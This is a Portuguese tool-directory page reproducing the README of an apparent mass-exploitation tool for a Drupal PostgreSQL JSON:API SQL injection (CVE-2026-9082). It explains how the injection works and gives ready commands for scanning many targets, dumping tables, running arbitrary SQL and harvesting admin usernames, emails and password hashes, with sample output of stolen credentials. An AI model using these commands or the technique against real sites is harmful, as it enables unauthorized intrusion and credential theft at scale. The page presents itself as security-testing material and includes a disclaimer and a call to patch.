Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
drupal-jsonapi-sqli-scanner — Escaner: CVE-2026-9082 Drupal PostgreSQL SQLi via JSON:API — escaner Python para SQLi não autenticado que leva a RCE (CISA KEV) | Kitploit
Ferramentas/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesTestes de PenetraçãoRed TeamingSegurança de Banco de Dados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

Escaner: CVE-2026-9082 Drupal PostgreSQL SQLi via JSON:API — escaner Python para SQLi não autenticado que leva a RCE (CISA KEV)

Ver Repositório
21há 12 diasAinda não revisado

CVE-2026-9082 Crítico CISA KEV Versões Afetadas Licença

CVE-2026-9082 — Injeção SQL em Drupal PostgreSQL

Scanner em Massa e Ferramenta de Exploração

Injeção SQL não autenticada no Drupal Core (PostgreSQL)
Injeção de chave de array de filtro JSON:API via abuso do nome do placeholder PDO


Visão Geral

CVE-2026-9082 é uma vulnerabilidade de injeção SQL Altamente Crítica no Drupal Core que afeta todos os sites com backend PostgreSQL que executam Drupal 8.0 até 11.3.9. Adicionada ao catálogo CISA Known Exploited Vulnerabilities (KEV) em 2026-05-22 — explorada ativamente na natureza.

Impacto

SeveridadeCVSSAutenticação NecessáriaVetor de Ataque
Crítica9.8+NenhumaHTTP (JSON:API)
  • Exfiltração de dados — extrair bancos de dados, usuários, hashes de senha
  • Escalação de privilégios — criar contas de administrador, modificar conteúdo
  • Execução remota de código — em algumas configurações via pg_exec() ou COPY ... PROGRAM

Versões Afetadas

StatusVersões
❌ VulnerávelDrupal 8.0.0 → 11.3.9 (backend PostgreSQL)
✅ Corrigida11.3.10, 11.2.12, 10.6.9, 10.5.10

Como Funciona

A falha existe em core/modules/pgsql/src/EntityQuery/Condition.php. O método translateCondition() usa chaves de array controladas pelo usuário a partir dos parâmetros de filtro da JSON:API para construir nomes de placeholders PDO. O PDO só reconhece [a-zA-Z0-9_] como nomes de placeholders, portanto qualquer sufixo após ) torna-se SQL literal injetado na consulta.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Recursos

  • ✅ Scanner em massa — escanear centenas de alvos simultaneamente
  • ✅ Modo de alvo único — verificar sites Drupal individuais
  • ✅ Detecção baseada em tempo — confirmação de SQLi cego via pg_sleep()
  • ✅ Detecção baseada em booleanos — comparação de contagem de linhas
  • ✅ Extração de versão — identificar a versão do PostgreSQL
  • ✅ Informações do banco de dados — extrair usuário atual e nome do banco de dados
  • ✅ Coleta de credenciais de administrador — nome de usuário, e-mail, hash de senha (uid=1)
  • ✅ Listagem de tabelas — enumerar todas as tabelas públicas
  • ✅ Consultas SQL personalizadas — executar qualquer consulta de extração
  • ✅ Suporte a proxy — rotear por meio do Burp Suite ou similar
  • ✅ Saída para arquivo — salvar resultados da varredura em massa
  • ✅ Saída colorida no terminal — resultados fáceis de ler

Instalação

Pré-requisitos

  • Python 3.8+
  • pip (gerenciador de pacotes Python)

Instalar Dependências

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

Só isso! Apenas uma dependência — requests.


Uso

🕵️ Verificar Alvo Único

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Varredura em Massa de Múltiplos Alvos

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

Formato do targets.txt:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 Extrair Versão do PostgreSQL

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Extrair Informações do Banco de Dados

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Coletar Credenciais de Administrador (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 Listar Todas as Tabelas

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Consulta SQL Personalizada

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Salvar Resultados em Arquivo

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Usar Proxy (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Personalizar Temporização

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Referência de Comandos


Exemplo de Saída

Alvo Vulnerável

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Coleta de Credenciais de Administrador

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

Referências


⚠️ Aviso Legal

Esta ferramenta é apenas para testes de segurança autorizados, fins educacionais e pesquisa ética.

O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.


Autor

Ridhin V A (@ridhinva) — Caçador de bug bounty e pesquisador de segurança

Criada porque a CISA KEV informou que está sendo explorada ativamente. Atualize seus sites Drupal.

Baixar ferramenta
FlagDescrição
-u, --urlURL do alvo único
-f, --fileArquivo com alvos (um por linha)
-o, --outputSalvar resultados da varredura em arquivo
--checkVerificar se o alvo é vulnerável
--versionExtrair a versão do PostgreSQL
--dbinfoExtrair usuário do banco de dados e nome do banco
--adminExtrair credenciais de administrador do Drupal (uid=1)
--tablesListar todas as tabelas do banco de dados
--queryConsulta de extração SQL personalizada
--threadsThreads para varredura em massa (padrão: 20)
--timeoutTempo limite da solicitação HTTP (padrão: 30s)
--delayAtraso de pg_sleep para detecção (padrão: 5s)
--no-ssl-verifyIgnorar verificação do certificado TLS
--proxyProxy HTTP (ex.: http://127.0.0.1:8080)
FonteLink
Advisory do DrupalSA-CORE-2026-004
CISA KEVCVE-2026-9082
Commit do Patchea9524d9
Entrada NVDCVE-2026-9082
DescobridorMichael Maturi